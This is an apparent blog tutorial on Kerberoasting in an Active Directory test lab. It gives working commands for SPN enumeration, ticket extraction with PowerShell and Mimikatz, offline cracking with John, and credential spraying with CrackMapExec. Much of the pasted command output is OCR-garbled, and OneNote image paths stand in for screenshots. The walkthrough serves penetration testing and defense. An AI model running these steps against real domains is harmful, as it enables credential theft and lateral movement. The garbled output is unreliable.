What You Need to Know About Kerberoasting

Kerberoasting a method of extracting a NTLM hash associated with service accounts. This is because a domain authenticated user is able to request service tickets (TGS) for service accounts within a domain, and this TGS is encrypted using the service accounts NTLM hash. Exploitation is straightforward;

  • Enumerate Service Principle Names (SPN) for services
  • Request TGS tickets for the accounts
  • Crack the NTLM hashes offline

Test Environment Setup

To try Kerberoasting in a non-production environment, create a user in Active Directory using the account name “spntest”. Set the account password to something which could be brute forced.

Configure an SPN for the account with the following command:

setspn -A spntest/WIN-SI6N6K2RCAE:80 spntest
—R spntest 
egistering SeruicePrincipaINames For 
spntest/WIN-S16N6K2RCRE:8Ø 
pdated object

Enumerating Service Principle Names

From an endpoint, enumerate existing SPN’s using the following command:

setspn -q */*
hecking domain 
Controllers 
Idap/WI N—S16N6K2RCRE . bgtest . locaI/ForestDnsZones . bgtest . local 
Idap/WI N—S16N6K2RCRE . bgtest . locaI/DomainDnsZones . bgtest . local 
NtFrs-88F5d2bd-b646-11d2-a6d3-øøcø4Fc9b232/WIN-S16N6K2RCRE.bgtest . local 
DF . bgtest . local 
DNS/WIN-S16N6K2RCRE.bgtest. 
GC/WIN-S16N6K2RCRE . bgtest . local/bgtest . local 
RestrictedKrbHost/WIN-S16N6K2RCRE.bgtest.10ca1 
RestrictedKrbHost/WIN-S16N6K2RCRE 
HOST/WIN-S16N6K2RCRE/BGIESr 
HOST/WIN-S16N6K2RCRE.bgtest . loca1/BGIESr 
HOST/WIN-S16N6K2RCRE 
Hosr bgtest . local 
Hosr /WIN-S16N6K2RCRE . bgtest . local/bgtest . local 
Idap/WIN-S16N6K2RCRE/BGIESr 
. _msdcs . bgtest . local 
Idap/WIN-S16N6K2RCRE. . loca1/BGIESr 
Idap/WIN-S16N6K2RCRE 
. bgtest . local 
Idap/WIN-S16N6K2RCRE . bgtest . local/bgtest . local 
N=krbtgt CN=Users DC=bgtest DC=IocaI 
kadmin/changepw 
r ERMSRU/CLIENTI 
TERMSRU/CLIENTI . bgtest . local 
RestrictedKrbHost/CLI ENTI 
HOST/CLIENTI 
RestrictedKrbHost/CLIENTI . bgtest . local 
Hosr 'CLIENTI . bgtest . local 
r ERMSRU/CLIEN12 
TERMSRU/C1ient2 . bgtest . local 
RestrictedKrbHost/CLIEN12 
HOST/CLIENT2 
RestrictedKrbHost/CLIENT2 . bgtest . local 
Hosr 'CLIENT2 . bgtest . local 
N=spntest CN=Users DC=bgtest DC=IocaI 
spntest/WIN-S16N6K2RCRE:8Ø 
xisting SPN Found! 
. local

Extracting Hashes

There are a number of methods to extract the account hashes.

PowerShell with Mimikatz

Retrieve the tickets using PowerShell:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'spntest/WIN-SI6N6K2RCAE:80'
C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image003.png

With the tickets now in memory, Mimikatz can dump them to file:

kerberos::list /export
C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image004.png

The tickets can then be stored offline and converted to John the ripper format, then cracked using John:

/usr/share/john/kirbi2john.py 1-40a00000-alice@spntest~WIN-SI6N6K2RCAE~80-BGTEST.LOCAL.kirbi > spntest_ticket.txt

john spntest_ticket.txt
C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image005.png

The above output shows John has determined the password for the spntest account is “Password1”.

PowerShell

PowerShell EMPIRE includes the Invoke-Kerberoast module:

icketByteHexStream 
ash 
amRccountName 
is t inguishedName 
eru ice Princ ipa IName 
D4D1 
BS46E846456C4?53D6646 
EBBR2øCDR9B8 
spntest 
: CN=spntest. CN=Users 
. spntest/WIN-S16N6K2RCRE:8Ø

Native Executable

Rubeus is a c# Win32 executable which can also extract the hashes in a similar format to Invoke-Kerberos:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image007.png

With this process complete, we can use CrackMapExec to verify which systems the credentials work on:

crackmapexec smb 172.16.16.200/29 -d BGTEST -u spntest -p Password1